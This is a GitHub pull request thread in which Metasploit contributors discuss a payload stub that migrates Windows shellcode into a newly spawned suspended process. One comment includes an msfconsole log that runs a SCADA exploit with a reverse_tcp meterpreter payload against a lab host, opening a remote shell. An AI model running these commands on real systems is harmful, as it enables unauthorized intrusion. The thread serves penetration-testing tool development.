Add migrate stub option to Windows x86 payloads. Spawns payload in new process. #909

Closed (wants to merge 1 commit)

Conversation

scriptjunkie (Contributor) commented Oct 14, 2012

Based on http://dev.metasploit.com/redmine/issues/4943 by corelanc0d3r, with a number of notable changes:

  • Spawns new process suspended, so any executable can be used without dying or displaying windows
  • Does not delay, escaping unstable processes faster
  • Using sf/metasploit block_api standard shellcode base for easier maintenance and to avoid crashes
  • Integrated into Msf::Payload::Windows using advanced options so that it can be used with any payload (such as vba macros and exe injects)
  • Uses same techniques as Linux shellcode prepends for easier maintenance

I just tested it out on a number of attacks and was very happy - got lots of stable meterpreter sessions that were previously dying or not even connecting.

wchen-r7 (Contributor) commented Oct 14, 2012

> got lots of stable meterpreter sessions that were previously dying or not even connecting.

Which ones?

scriptjunkie (Contributor) commented Oct 14, 2012

When adding a payload to an existing executable (-k option), if the executable finished running quickly (like many command-line utilities), the session would die before I could migrate out. Same story on in-memory vba payloads if someone closed Excel or Word before you migrate out.

wchen-r7 (Contributor) commented Oct 15, 2012

Ok, thanks. I'm also gonna try to bring in corelanc0d3r for testing.

corelanc0d3r (Contributor) commented Oct 15, 2012

will do some testing today, good work!!

corelanc0d3r (Contributor) commented Oct 15, 2012

btw - I have had a case (on a slower machine) where I had to delay & wait for the new process to fully run before injecting the payload - maybe we can set delay as an option (and set it to 0 by default, so it would omit the delay routine?)

corelanc0d3r (Contributor) commented Oct 15, 2012

was comparing the code with the last pull request I made regarding this code (df3058e)

In the WriteProcessMemory() routine, I simply pushed esp as the lpNumberOfBytesWritten argument. In your code, I see lea esi, [edi + 4] and push esi (which is slightly larger than push esp). Any particular reason for doing that?

then on line 223 and 224, we get a pointer to the payload. There's no need to pop and push, because the pointer is already where it needs to be. (see my code at line 515 and 516)

corelanc0d3r (Contributor) commented Oct 15, 2012

I have replaced the lea esi,[edi+4] / push esi with a simple push esp,
and removed the pop edi & push edx

result:

msf > use exploit/windows/scada/realwin_corelan 
msf  exploit(realwin_corelan) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(realwin_corelan) > set lhost 192.168.201.201
lhost => 192.168.201.201
msf  exploit(realwin_corelan) > set PrependMigrate true
PrependMigrate => true
msf  exploit(realwin_corelan) > set RHOST 192.168.201.205
RHOST => 192.168.201.205
msf  exploit(realwin_corelan) > exploit

[*] Started reverse handler on 192.168.201.201:4444 
[*] Trying target XP SP3...
[*] Sending stage (752128 bytes) to 192.168.201.205
[*] Meterpreter session 1 opened (192.168.201.201:4444 -> 192.168.201.205:4477) at Mon Oct 15 20:24:32 +0200 2012

meterpreter > shell
Process 3676 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\PROGRA~1\DATAC\Real.Win>

To me, the module is good to go (with the suggested changes).
If there ever is a need to add an optional delay after creating the suspended process, I guess it can still be added.

thanks for picking this one up again :)

corelanc0d3r (Contributor) commented Oct 15, 2012

if you feel like adding references or credits in the code - I used the technique before & described it here: https://www.corelan.be/index.php/2011/07/27/metasploit-bounty-the-good-the-bad-and-the-ugly/

(I guess we can now also update that iconics module, remove the hardcoded stub & replace it with a pre-defined, non-changeable PrependMigrate set to true (or will users always be able to overrule that?)

jlee-r7 (Contributor) commented Oct 15, 2012

Please fix your commit message and re-request. See HACKING and http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html

jlee-r7 closed this Oct 15, 2012

scriptjunkie (Contributor) commented Oct 15, 2012

corelanc0d3r, I would think that crashes were caused by the api-finding code iterating over the module lists while DLLs are being loaded and those lists are being changed. Or maybe process-specific code could be changing something. Either way, I spawned the process suspended so that there should not be any other code running that could interfere with the shellcode. I had gotten crashes on a win7 64 VM before I made the changes but not after. Without any other active threads, I am not sure what would cause a crash, but if you think of something or still get crashes, let me know.

scriptjunkie (Contributor) commented Oct 15, 2012

Also, you are right about the push esp and pop edx/push edx. I had removed the push ecx from the diff here http://dev.metasploit.com/redmine/issues/4943 and hadn't looked close enough to see the duplication. The lea esi... came from me thinking about using that address for something else, but doesn't make sense now. I'll recommit and re-pull request.